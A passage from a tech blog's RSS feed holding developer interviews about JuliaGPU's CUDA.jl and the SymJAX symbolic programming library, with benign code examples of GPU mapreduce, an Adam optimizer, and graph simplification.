&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;julia&amp;gt; mapreduce(identity, +, CuArray([1,2,3]))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;6&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;julia&amp;gt; mapreduce(sin, *, CuArray([1.1,2.2,3.3]))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;-0.11366175839582586&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;With this powerful &lt;code&gt;mapreduce&lt;&#x2F;code&gt; abstraction, implemented by an experienced GPU programmer, other developers can create derived abstractions without such experience. For example, let’s implement a &lt;code&gt;count&lt;&#x2F;code&gt; function that counts the number of items for which a predicate holds true:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;count(predicate, array) = mapreduce(predicate, +, array)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;julia&amp;gt; a = CUDA.rand(Int8, 4)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;4-element CuArray{Int8,1}:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 51&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 70&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 100&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;julia&amp;gt; count(iseven, a)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Even though our &lt;code&gt;mapreduce&lt;&#x2F;code&gt; implementation has not been specifically implemented for the &lt;code&gt;Int8&lt;&#x2F;code&gt; type or the &lt;code&gt;iseven&lt;&#x2F;code&gt; predicate, the Julia compiler automatically specializes the implementation, resulting in a kernel optimized for this specific invocation.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-were-the-biggest-challenges-when-developing-packages-for-juliagpu-particularly-writing-a-low-level-package-such-as-cuda-jl-in-a-high-level-programming-language-such-as-julia&quot;&gt;What were the biggest challenges when developing packages for JuliaGPU, particularly writing a low level package such as CUDA.jl in a high level programming language such as Julia?&lt;&#x2F;h4&gt;
&lt;p&gt;Much of the initial work focused on developing tools that make it possible to write low-level code in Julia. For example, we developed the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;maleadt&#x2F;LLVM.jl&quot;&gt;LLVM.jl&lt;&#x2F;a&gt; package that gives us access to the LLVM APIs. Recently, our focus has shifted towards generalizing this functionality so that other GPU back-ends, like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;JuliaGPU&#x2F;AMDGPU.jl&quot;&gt;AMDGPU.jl&lt;&#x2F;a&gt; or &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;JuliaGPU&#x2F;oneAPI.jl&quot;&gt;oneAPI.jl&lt;&#x2F;a&gt;, can benefit from developments to CUDA.jl. Vendor-neutral array operations, for example, are now implemented in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;JuliaGPU&#x2F;GPUArrays.jl&quot;&gt;GPUArrays.jl&lt;&#x2F;a&gt;, whereas shared compiler functionality now lives in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;JuliaGPU&#x2F;GPUCompiler.jl&quot;&gt;GPUCompiler.jl&lt;&#x2F;a&gt;. That should make it possible to work on several GPU back-ends, even though most of them are maintained by only a single developer.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;regarding-the-latest-release-announced-in-the-juliagpu-blog-about-multi-device-programming-what-are-the-difficulties-that-this-new-functionality-solves-is-this-relevant-in-the-industry-where-big-computational-resources-are-needed&quot;&gt;Regarding the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;juliagpu.org&#x2F;2020-07-18-cuda_1.3&#x2F;&quot;&gt;latest release&lt;&#x2F;a&gt; announced in the JuliaGPU blog about multi-device programming, what are the difficulties that this new functionality solves? Is this relevant in the industry where big computational resources are needed?&lt;&#x2F;h4&gt;
&lt;p&gt;In industry or large research labs, MPI is often used to distribute work across multiple nodes or GPUs. Julia’s MPI.jl supports that use case, and integrates with CUDA.jl where necessary. The multi-device functionality added in CUDA.jl 1.3 additionally makes it possible to use multiple GPUs within a single process. It maps nicely onto Julia’s task-based concurrency, and makes it easy to distribute work within a single node:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Threads.@threads for dev in devices()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; device!(dev)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; # do some work here&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h4 id=&quot;what-are-the-plans-for-the-near-future&quot;&gt;&lt;strong&gt;What are the plans for the near future?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;There aren’t any specific roadmaps, but one upcoming major feature is proper support for reduced-precision inputs, like 16-bit floating point. We already support Float16 arrays where CUBLAS or CUDNN do, but the next version of Julia will make it possible to write kernels that operate on these values.&lt;&#x2F;p&gt;
&lt;p&gt;Other than that, features come as they do :-) Be sure to subscribe to the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;juliagpu.org&#x2F;post&#x2F;&quot;&gt;JuliaGPU blog&lt;&#x2F;a&gt; where we publish a short post for every major release of Julia’s GPU back-ends.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;You can find Tim at @&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;maleadt&quot;&gt;maleadt&lt;&#x2F;a&gt; on Twitter!&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>SymJAX: symbolic CPU&#x2F;GPU&#x2F;TPU programming</title>
          <pubDate>Fri, 18 Sep 2020 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/symjax-symbolic-cpu-gpu-tpu-programming/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/symjax-symbolic-cpu-gpu-tpu-programming/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/symjax-symbolic-cpu-gpu-tpu-programming/">&lt;h4 id=&quot;a-symbolic-programming-version-of-jax&quot;&gt;A symbolic programming version of JAX&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-U2wpT5qoWqSOwrgYtgLJ3w.png&quot; alt=&quot;&quot; &#x2F;&gt;SymJAX’s really cool logo&lt;&#x2F;p&gt;
&lt;p&gt;As we try to gain a deeper understanding of the world we live in, we tend to add more and more complex relationships to the models we use to describe it, so we need to borrow a hand from computers to run them.&lt;&#x2F;p&gt;
&lt;p&gt;Complex relationships are often represented in the form of graphs, and many learning algorithms require differentiation of some kind.&lt;&#x2F;p&gt;
&lt;p&gt;We also don’t want to lose mathematical interpretability, so a symbolic programming framework that lets us represent these complex models in a familiar way, with a Theano-like user experience, would be a very interesting tool to have in our pocket.&lt;&#x2F;p&gt;
&lt;p&gt;This is what SymJAX has come to offer us. To learn more about it, we interviewed &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;RandallBalestriero&quot;&gt;Randall Balestriero&lt;&#x2F;a&gt;, the creator and sole contributor of the project so far.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-is-symjax&quot;&gt;What is SymJAX?&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;RandallBalestriero&#x2F;SymJAX&quot;&gt;SymJAX&lt;&#x2F;a&gt; is a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;networkx.github.io&#x2F;&quot;&gt;NetworkX&lt;&#x2F;a&gt; powered symbolic programming version of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;google&#x2F;jax&quot;&gt;JAX&lt;&#x2F;a&gt; providing a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;Theano&#x2F;Theano&quot;&gt;Theano&lt;&#x2F;a&gt;-like user experience. In addition to simplifying graph input&#x2F;output, variable updates and providing graph utilities such as loading and saving, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;RandallBalestriero&#x2F;SymJAX&quot;&gt;SymJAX&lt;&#x2F;a&gt; features machine learning and deep learning utilities similar to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;Lasagne&#x2F;Lasagne&quot;&gt;Lasagne&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.tensorflow.org&#x2F;&quot;&gt;Tensorflow1&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Illustrative example: Adam optimizer of a dummy loss&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;import symjax&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;import symjax.tensor as T&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;from symjax.nn.optimizers import Adam&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# we create a persistent variable to be optimized&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;z = T.Variable(3.0, dtype=&amp;quot;float32&amp;quot;, trainable=True)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# the optimization is about minimizing the following loss&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;loss = T.power(z - 1, 2, name=&amp;#39;loss&amp;#39;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# this loss is just a node in the graph, nothing is computed yet&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;print(loss)  # Op(name=loss, fn=power, shape=(), dtype=float32, scope=&#x2F;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# we minimize it with Adam; we can omit assigning it to a variable since the&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# internal updates are automatically collected, 0.1 is the learning rate&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Adam(loss, 0.1)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# we create the function (XLA compiled graph) and define the inputs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# (here none), the outputs and the persistent variable updates (from Adam)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;train = symjax.function(outputs=[loss, z], updates=symjax.get_updates())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# for illustrative purposes, we perform 200 steps and reset the graph after 100 steps&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;for i in range(200):&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    if (i + 1) % 100 == 0:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        # we can use any identifier to select what to reset (&amp;#39;*&amp;#39; is the default);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        # to reset only the variables created by Adam (the moving averages etc.)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        # one would use, for example,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        # symjax.reset_variables(&amp;#39;&#x2F;AdamOptimizer*&amp;#39;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        # in our case let&amp;#39;s reset all variables&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        symjax.reset_variables()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    # the output of this function is the current loss and value of z; when called it also&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    # internally performs the given updates computed from Adam&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    train()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;For additional examples please see: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;symjax.readthedocs.io&#x2F;en&#x2F;latest&#x2F;auto_examples&#x2F;&quot;&gt;https:&#x2F;&#x2F;symjax.readthedocs.io&#x2F;en&#x2F;latest&#x2F;auto_examples&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;h4 id=&quot;the-symjax-documentation-reads-the-number-of-libraries-topping-jax-tensorflow-torch-is-large-and-growing-by-the-day-what-symjax-offers-as-opposed-to-most-is-an-all-in-one-library-with-diverse-functionalities-what-s-the-main-issue-with-having-to-use-multiple-libraries-and-how-does-creating-a-single-library-solve-it&quot;&gt;The SymJAX documentation reads: “The number of libraries topping Jax&#x2F;Tensorflow&#x2F;Torch is large and growing by the day. What SymJAX offers as opposed to most is an all-in-one library with diverse functionalities”. What’s the main issue with having to use multiple libraries and how does creating a single library solve it?&lt;&#x2F;h4&gt;
&lt;p&gt;There is absolutely nothing wrong with having complementary libraries that can be interconnected. In my opinion, the current limitation of the mentioned libraries is the absence of inter-compatibility, which makes it difficult to use features from one with another. This is different from, say, numpy and scipy, which complement each other seamlessly. In SymJAX, the JAX backend allows any JAX library to be directly imported into SymJAX (much as C&#x2F;CUDA code could easily be imported into Theano). Second, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.tensorflow.org&#x2F;probability&#x2F;api_docs&#x2F;python&#x2F;tfp&#x2F;experimental&#x2F;substrates&#x2F;jax&quot;&gt;Tensorflow is increasingly leveraging a JAX backend&lt;&#x2F;a&gt;, and this development will also make it easy to import those Tensorflow utilities into SymJAX. People interested in using a standard JAX&#x2F;Tensorflow library while benefiting from SymJAX utilities can do so easily. The other way around, any computational graph designed in SymJAX with SymJAX utilities can also be translated back into pure JAX, allowing JAX libraries to benefit from SymJAX. The target end result is that each library’s newly developed tools would directly benefit all cross-library users.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;the-documentation-states-that-one-of-the-goals-of-symjax-is-to-optimize-processes-how-does-the-library-enable-that-optimization-how-does-it-compare-to-other-technologies&quot;&gt;The documentation states that one of the goals of SymJAX is to optimize processes. How does the library enable that optimization? How does it compare to other technologies?&lt;&#x2F;h4&gt;
&lt;p&gt;There are really two levels of (computational) optimization in SymJAX. First, SymJAX allows one to define a computational graph, which can be viewed as a computational roadmap from inputs, through operations, to some desired outputs (possibly involving some persistent graph variable updates). This user-defined computational roadmap is obtained without performing any actual computation yet. It is then compiled with XLA, producing a sequence of computation kernels generated specifically for the given graph. This step can merge multiple low-level operations into a single kernel and has demonstrated performance gains, for example &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.tensorflow.org&#x2F;xla&#x2F;&quot;&gt;in Tensorflow&lt;&#x2F;a&gt;. This step alone gives SymJAX performance similar to Jax and XLA-Tensorflow, ceteris paribus.&lt;&#x2F;p&gt;
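&lt;p&gt;The define-then-compile workflow can be illustrated with a tiny, self-contained Python sketch. All names here are hypothetical and this is not the SymJAX API: building the graph performs no computation, and a real system would lower the graph to fused XLA kernels rather than interpret it as done below:&lt;&#x2F;p&gt;

```python
# Toy sketch of define-then-compile: constructing Node objects only records
# a computational roadmap; nothing runs until the compiled callable is invoked.

class Node:
    def __init__(self, fn, *parents):
        self.fn, self.parents = fn, parents

    def __add__(self, other):
        return Node(lambda a, b: a + b, self, lift(other))

    def __mul__(self, other):
        return Node(lambda a, b: a * b, self, lift(other))

class Input(Node):
    def __init__(self):
        super().__init__(None)

def lift(value):
    # wrap constants as leaf nodes so the whole expression stays a graph
    return value if isinstance(value, Node) else Node(lambda: value)

def evaluate(node, env):
    if isinstance(node, Input):
        return env[node]
    return node.fn(*(evaluate(p, env) for p in node.parents))

def compile_graph(output, inputs):
    # "compilation" here just closes over the graph; a real backend would
    # fuse and lower it to optimized kernels at this point
    return lambda *args: evaluate(output, dict(zip(inputs, args)))

x = Input()
loss = (x + 1) * (x + 1)      # graph only, nothing computed yet
f = compile_graph(loss, [x])
print(f(2.0))                 # prints 9.0
```

Because the full roadmap exists before anything runs, a compiler gets to see and rewrite the whole computation at once, which is exactly what enables the kernel fusion described above.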
&lt;p&gt;The second and most important feature of SymJAX is its graph canonicalization. This is the same feature that was employed in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.deeplearning.net&#x2F;software&#x2F;theano&#x2F;&quot;&gt;now-discontinued Theano library&lt;&#x2F;a&gt;. Graph canonicalization allows generic graph optimizations, such as replacing the following subgraph:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;log( exp(x) * exp(4 + x) )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;by the much simpler, yet equivalent subgraph:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;2 * x + 4&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This type of graph simplification can be applied to much more complex parts of the graph, such as replacing the sum of two Gaussian distributions by a single Gaussian with different mean and covariance, hence greatly reducing the computational burden of random sampling. This reduced graph is then XLA compiled, further optimizing the low-level operations. This allows for much broader optimization than is present in XLA and in most current libraries, as it requires &lt;em&gt;a priori&lt;&#x2F;em&gt; knowledge of the computational graph.&lt;&#x2F;p&gt;
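&lt;p&gt;To make the canonicalization idea concrete, here is a minimal rule-based rewrite pass over expressions encoded as nested tuples. This is only an illustration of the general technique, not how SymJAX implements it:&lt;&#x2F;p&gt;

```python
# Rule-based rewriting on expression graphs encoded as nested tuples.
# Two rules: log(exp(a)) -> a, and log(exp(a) * exp(b)) -> a + b.
# This mirrors the log(exp(x) * exp(4 + x)) -> 2*x + 4 example above.

def simplify(expr):
    if not isinstance(expr, tuple):
        return expr                      # leaves: symbols or constants
    # canonicalize children first, bottom-up
    expr = (expr[0],) + tuple(simplify(e) for e in expr[1:])
    if expr[0] == "log":
        arg = expr[1]
        if isinstance(arg, tuple) and arg[0] == "exp":
            return arg[1]                # log(exp(a)) -> a
        if (isinstance(arg, tuple) and arg[0] == "mul"
                and all(isinstance(f, tuple) and f[0] == "exp" for f in arg[1:])):
            # log(exp(a) * exp(b) * ...) -> a + b + ...
            return simplify(("add",) + tuple(f[1] for f in arg[1:]))
    return expr

graph = ("log", ("mul", ("exp", "x"), ("exp", ("add", 4, "x"))))
print(simplify(graph))  # ('add', 'x', ('add', 4, 'x')), i.e. x + (4 + x) = 2*x + 4
```

A real canonicalizer applies a much larger rule set to a fixed point, but the principle is the same: cheap, equivalent subgraphs replace expensive ones before compilation.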
&lt;h4 id=&quot;does-symjax-support-all-state-of-art-neural-network-architectures&quot;&gt;Does SymJAX support all state-of-art neural network architectures?&lt;&#x2F;h4&gt;
&lt;p&gt;SymJAX provides some basic neural network layer implementations out of the box. The number of implemented layers increases with each release but surely cannot keep up with the exponentially growing number of neural network flavours being designed by the deep learning community. However, the core of SymJAX provides all the standard operations, featuring almost all numpy and scipy functions among many others. This allows anyone to implement their own layers and neural networks (as well as losses or any other bit of a deep learning pipeline), ensuring that any needed architecture can be implemented on the go.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-were-the-biggest-challenges-in-allowing-a-broad-hardware-support-gpus-tpus&quot;&gt;What were the biggest challenges in allowing a broad hardware support (GPUs, TPUs)?&lt;&#x2F;h4&gt;
&lt;p&gt;One of the crucial benefits of leveraging JAX as the backend XLA interface is the ability to benefit from its latest hardware support. Nothing additional was needed in SymJAX to enable such broad support.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;is-there-support-for-dynamic-computation-graphs-a-la-pytorch-if-not-are-there-any-plans-for-it&quot;&gt;Is there support for dynamic computation graphs à la Pytorch? If not, are there any plans for it?&lt;&#x2F;h4&gt;
&lt;p&gt;The computational graph in itself can be evaluated without XLA compilation, allowing one to define a graph, evaluate it, and keep building it while evaluating it again (similar to session.run from Tensorflow 1). This would not give optimal performance but can be useful in some cases and would allow very general dynamic computation graphs. For best performance, however, the graph needs to be compiled, effectively freezing its structure. We do allow for one dynamic aspect to persist after compilation: a dynamic leading axis length (such as a variable batch size). This makes it possible, if needed, to feed shape-varying inputs to a compiled graph. For now this is only possible on the leading axis, but more general dynamic computation graphs will be considered in the future: the parts of the graph that do not vary dynamically would be compiled separately, allowing high-performance “hybrid” graphs to be evaluated.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;symjax-pays-homage-to-theano-in-many-aspects-what-s-different-from-theano-and-why-not-improve-theano-to-bring-it-up-to-date-instead-of-creating-a-new-library-from-scratch&quot;&gt;SymJAX pays homage to Theano in many aspects. What’s different from Theano and why not improve Theano to bring it up to date instead of creating a new library from scratch?&lt;&#x2F;h4&gt;
&lt;p&gt;The minimalist version of SymJAX and Theano both make the user define a graph, compile it and then evaluate it. However, SymJAX offers various user-friendly features that greatly simplify its use compared to Theano, such as:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;much simpler graph construction and monitoring with explicit shape and dtype of each node&lt;&#x2F;li&gt;
&lt;li&gt;lazy (non compiled) partial graph evaluation (a la session.run or pytorch)&lt;&#x2F;li&gt;
&lt;li&gt;the concept of scopes (a la Tensorflow) and node&#x2F;variable&#x2F;placeholder fetching based on their names and scopes&lt;&#x2F;li&gt;
&lt;li&gt;utilities to save, load and reset variables and graphs&lt;&#x2F;li&gt;
&lt;li&gt;various graph analysis tools from networkX that can be used to study the computational graph and provide in-depth structural analysis&lt;&#x2F;li&gt;
&lt;li&gt;side utilities to allow deep learning pipelines to be built&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;The option of updating Theano was considered, but it would have forced us not only to implement the above features (requiring some important changes in the Theano design) but also to keep working on the XLA interface&#x2F;compilation and on support for the latest hardware, including not only new GPU releases but also novel hardware like TPUs. By instead building upon the Jax XLA interface, we directly benefit from the latest XLA support, allowing us to focus on additional features and graph-related utilities.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;theano-is-powerful-but-in-terms-of-popularity-it-lost-the-battle-to-the-more-high-level-tensorflow-what-is-the-user-you-have-in-mind-for-symjax-how-is-it-better-than-the-other-options&quot;&gt;Theano is powerful but in terms of popularity it lost the battle to the more high-level TensorFlow. What is the user you have in mind for SymJAX? How is it better than the other options?&lt;&#x2F;h4&gt;
&lt;p&gt;As per the above points, I believe that Theano lost traction due to its lack of user-friendly features, making it too tedious to build a working pipeline as opposed to Tensorflow (or PyTorch), which allowed for a more flexible set-up thanks to features like automatically gathering the trainable variables to be differentiated, automatically resetting all the graph variables without keeping track of them explicitly, and so on. In addition, Theano suffered from a very slow compilation step and an often difficult GPU-support installation.&lt;&#x2F;p&gt;
&lt;p&gt;However, no one denies the benefits of Theano in terms of its graph simplification abilities and its design. By combining the best of both libraries and incorporating additional JAX abilities, you obtain SymJAX, which I believe will attract users from any background. In fact, one of the main efforts in SymJAX is to make the symbolic programming paradigm extremely user-friendly, allowing anyone to employ it with minimum burden while enjoying all the induced benefits.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;how-many-people-are-behind-this-project-are-you-looking-for-contributors&quot;&gt;How many people are behind this project? Are you looking for contributors?&lt;&#x2F;h4&gt;
&lt;p&gt;I have been the sole contributor to this project until recently, when a geophysicist colleague stepped in. There has also been rising interest from the PyMC developer team in seeing how fit SymJAX would be to replace the Theano backend they employ. This ongoing discussion has also led to additional contributions to SymJAX. All contributions are welcome, and anyone interested in getting more actively involved with this project should feel free to contact me!&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-is-symjax-s-current-status-and-plans-for-the-near-future-how-close-is-the-project-to-its-first-stable-release&quot;&gt;What is SymJAX’s current status and plans for the near future? How close is the project to its first stable release?&lt;&#x2F;h4&gt;
